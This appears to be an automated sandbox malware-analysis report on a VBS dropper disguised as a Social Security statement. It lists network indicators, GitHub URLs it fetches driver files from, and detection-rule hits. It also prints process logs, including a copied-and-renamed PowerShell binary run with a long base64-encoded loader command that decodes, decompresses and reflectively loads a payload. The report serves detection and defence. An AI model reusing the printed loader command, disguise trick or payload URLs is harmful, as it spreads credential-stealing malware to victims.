              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: unknownTCP traffic detected without corresponding DNS query: 176.150.119.15
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F6727C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2138865205.0000018180031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2138865205.0000018180047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2138865205.000001818005B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F6727C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F6727C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F6727C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
              Source: InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
              Source: InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
              Source: powershell.exe, 00000011.00000002.2138865205.00000181804F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F6727C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot

              E-Banking Fraud

              barindex
              Malicious encrypted Powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" -enc JABWAGkAaAB3AHgAaQBrAHQAZwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEgAZwB3AHIAYgBjAGkAegBoAGsAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABWAGkAaAB3AHgAaQBrAHQAZwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAZwB3AHIAYgBjAGkAegBoAGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEMAbwB4AG0AYgB4AG4AZgB0AGgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAKQA7ACQATwB2AGoAbQBhACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABIAHgAYgB6AGgAbQB5AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBvAHAAeQBUAG8AKAAgACQATwB2AGoAbQBhACAAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBsAG8AcwBlACgAKQA7ACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgACQATwB2AGoAbQBhAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAEwAdABnAHQAegB6AHEAYwB1AHYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAFUAaABmAGwAdgAgAD0AIAAkAEwAdABnAHQAegB6AHEAYwB1AHYALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABVAGgAZgBsAHYALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFUAaABmAGwAdgAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" -enc JABWAGkAaAB3AHgAaQBrAHQAZwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEgAZwB3AHIAYgBjAGkAegBoAGsAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABWAGkAaAB3AHgAaQBrAHQAZwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAZwB3AHIAYgBjAGkAegBoAGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEMAbwB4AG0AYgB4AG4AZgB0AGgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAKQA7ACQATwB2AGoAbQBhACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABIAHgAYgB6AGgAbQB5AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBvAHAAeQBUAG8AKAAgACQATwB2AGoAbQBhACAAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBsAG8AcwBlACgAKQA7ACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgACQATwB2AGoAbQBhAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAEwAdABnAHQAegB6AHEAYwB1AHYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAFUAaABmAGwAdgAgAD0AIAAkAEwAdABnAHQAegB6AHEAYwB1AHYALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABVAGgAZgBsAHYALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFUAaABmAGwAdgAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=Jump to behavior

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Reads the Security eventlog
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
              Reads the System eventlog
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: Process Memory Space: Social_Security_Statement_Review.vbs.exe PID: 1648, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2274
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2274Jump to behavior
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887BD78B04_2_00007FF887BD78B0
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887F221A04_2_00007FF887F221A0
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887F372FD4_2_00007FF887F372FD
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887F29B794_2_00007FF887F29B79
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeCode function: 4_2_00007FF887F268314_2_00007FF887F26831
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 16_2_00007FF887C166D516_2_00007FF887C166D5
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 16_2_00007FF887C170C116_2_00007FF887C170C1
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 16_2_00007FF887C18C4816_2_00007FF887C18C48
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 16_2_00007FF887C1875A16_2_00007FF887C1875A
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 16_2_00007FF887C12D1816_2_00007FF887C12D18
              Source: Social_Security_Statement_Review.vbsInitial sample: Strings found which are bigger than 50
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000000.1462535951.00007FF6C0E99000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F5728F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRzjuqrnykvu.exe" vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F581EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F58309000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRzjuqrnykvu.exe" vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157787430.0000024F6FC40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2055292137.0000024F5532A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57211000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Social_Security_Statement_Review.vbs
              Source: Social_Security_Statement_Review.vbs.exe.2.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Social_Security_Statement_Review.vbs
              Source: Process Memory Space: Social_Security_Statement_Review.vbs.exe PID: 1648, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, oDmwayYLiGBjuEoNNmf.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, oDmwayYLiGBjuEoNNmf.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, oDmwayYLiGBjuEoNNmf.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f68750e28.7.raw.unpack, oDmwayYLiGBjuEoNNmf.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, oDmwayYLiGBjuEoNNmf.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, oDmwayYLiGBjuEoNNmf.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, oDmwayYLiGBjuEoNNmf.csCryptographic APIs: 'CreateDecryptor'
              Source: 4.2.Social_Security_Statement_Review.vbs.exe.24f6862cfe8.6.raw.unpack, oDmwayYLiGBjuEoNNmf.csCryptographic APIs: 'CreateDecryptor'
              Source: classification engineClassification label: mal100.bank.spyw.expl.evad.winVBS@25/8@0/1
              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\57eee72b46
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kd5t4pbk.njz.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exeFile read: C:\Users\user\Desktop\Social_Security_Statement_Review.vbsJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" /Y
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" -enc JABWAGkAaAB3AHgAaQBrAHQAZwBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAEgAZwB3AHIAYgBjAGkAegBoAGsAIAA9ACAAZwBlAHQALQBjAG8AbgB0AGUAbgB0ACAAJABWAGkAaAB3AHgAaQBrAHQAZwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAZwB3AHIAYgBjAGkAegBoAGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEMAbwB4AG0AYgB4AG4AZgB0AGgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAKQA7ACQATwB2AGoAbQBhACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABIAHgAYgB6AGgAbQB5AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBvAHAAeQBUAG8AKAAgACQATwB2AGoAbQBhACAAKQA7ACQASAB4AGIAegBoAG0AeQB0AC4AQwBsAG8AcwBlACgAKQA7ACQAQwBvAHgAbQBiAHgAbgBmAHQAaAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEsAaQBoAGoAagBpAGQAbgB5ACAAPQAgACQATwB2AGoAbQBhAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGkAaABqAGoAaQBkAG4AeQApADsAIAAkAEwAdABnAHQAegB6AHEAYwB1AHYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG